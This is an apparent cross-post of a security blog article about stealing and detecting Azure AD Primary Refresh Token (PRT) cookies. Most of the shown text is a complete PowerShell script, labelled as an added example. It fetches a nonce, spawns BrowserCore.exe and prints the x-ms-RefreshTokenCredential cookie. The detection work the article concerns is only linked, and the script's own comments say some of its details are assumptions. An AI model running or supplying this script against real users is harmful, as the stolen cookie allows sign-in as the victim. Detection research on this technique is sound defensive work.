FalconFriday — Stealing and detecting Azure PRT cookies — 0xFF18



TL;DR: There is a lot of great research available on how to obtain an Azure Primary Refresh Token (PRT) cookie post-exploitation. This post outlines a way to bypass the default detection for this in Microsoft Defender for Endpoint (MDE), and how to detect that bypass in turn.

Azure PRTs have been covered extensively in research from @_dirkjan, and also by Lee Christensen in this post. In essence, there are two ways to make Windows hand you a PRT cookie. The 'easy' way is to use BrowserCore.exe. This executable reads a request containing a nonce from stdin and writes back the PRT cookie (the x-ms-RefreshTokenCredential value) on stdout. This is how, for example, the Chrome extension performs SSO with your Azure AD account. The tool ROADToken from @_dirkjan does exactly this.
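The stdin/stdout exchange described above, as an added example that is not code from the FalconForce post or from ROADToken. It drives BrowserCore.exe from PowerShell the way the browser extension would. The framing (a 4-byte little-endian length prefix followed by UTF-8 JSON, i.e. the Chrome native-messaging convention), the "GetCookies" request fields, the reply fields (`response[].name`, `response[].data`), the `srv_challenge` nonce endpoint and the default install path are all assumptions taken from publicly documented ROADtools behaviour, not from this page, and may change between Windows builds. It must run as the signed-in Azure AD user on a joined or registered device.

```powershell
# Added example: request a PRT cookie from BrowserCore.exe over its native-messaging
# interface. Not part of the original post or of ROADToken.
# Assumptions (not stated on the page): install path, message framing, request/reply
# JSON shape and the srv_challenge nonce endpoint.
param(
    [string]$Nonce,   # optional: supply a nonce you already obtained elsewhere
    [string]$BrowserCore = "$env:ProgramFiles\Windows Security\BrowserCore\BrowserCore.exe"  # assumed path
)

# 1. Obtain a fresh nonce if none was given (assumed endpoint; no authentication needed).
if (-not $Nonce) {
    $resp  = Invoke-RestMethod -Method Post -Uri 'https://login.microsoftonline.com/common/oauth2/token' `
                               -Body @{ grant_type = 'srv_challenge' }
    $Nonce = $resp.Nonce
}

# 2. Build the request the way the browser extension would (assumed field names).
$request = @{
    method = 'GetCookies'
    uri    = "https://login.microsoftonline.com/common/oauth2/authorize?sso_nonce=$Nonce"
    sender = 'https://login.microsoftonline.com'
} | ConvertTo-Json -Compress
$payload = [System.Text.Encoding]::UTF8.GetBytes($request)
$length  = [BitConverter]::GetBytes([int32]$payload.Length)   # little-endian on x86/x64

# 3. Spawn BrowserCore.exe with stdin and stdout redirected, just like a native-messaging host.
$psi = New-Object System.Diagnostics.ProcessStartInfo
$psi.FileName               = $BrowserCore
$psi.UseShellExecute        = $false
$psi.RedirectStandardInput  = $true
$psi.RedirectStandardOutput = $true
$psi.CreateNoWindow         = $true
$proc = [System.Diagnostics.Process]::Start($psi)

# Write the length prefix, then the JSON body.
$stdin = $proc.StandardInput.BaseStream
$stdin.Write($length, 0, 4)
$stdin.Write($payload, 0, $payload.Length)
$stdin.Flush()

# 4. Read the length-prefixed JSON reply from stdout, looping until the full body arrived.
$stdout   = $proc.StandardOutput.BaseStream
$hdr      = New-Object byte[] 4
$null     = $stdout.Read($hdr, 0, 4)
$replyLen = [BitConverter]::ToInt32($hdr, 0)
$buf      = New-Object byte[] $replyLen
$read     = 0
while ($read -lt $replyLen) {
    $n = $stdout.Read($buf, $read, $replyLen - $read)
    if ($n -le 0) { break }
    $read += $n
}
$proc.WaitForExit()
$reply = [System.Text.Encoding]::UTF8.GetString($buf, 0, $read) | ConvertFrom-Json

# 5. Pick the PRT cookie out of the reply. Its value is a JWT bound to the nonce we supplied,
#    so it is only usable for a short time and only for a login flow carrying that nonce.
$cookie = $reply.response | Where-Object { $_.name -eq 'x-ms-RefreshTokenCredential' }
if (-not $cookie) {
    throw "No PRT cookie returned. Raw reply: $($reply | ConvertTo-Json -Compress)"
}
"x-ms-RefreshTokenCredential=$($cookie.data)"
```

Two practical notes: the returned cookie is nonce-bound, so request the nonce immediately before use rather than caching one; and this is the loud, default route, in which a non-browser process spawns BrowserCore.exe with redirected standard handles, which is exactly the behaviour the full article goes on to contrast with its bypass and the detection for that bypass.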

Cross post from medium.com, please read the full article here:

https://medium.com/falconforce/falconfriday-stealing-and-detecting-azure-prt-cookies-0xff18-96efce74ce63

Direct link to our Github page:

https://github.com/FalconForceTeam/FalconFriday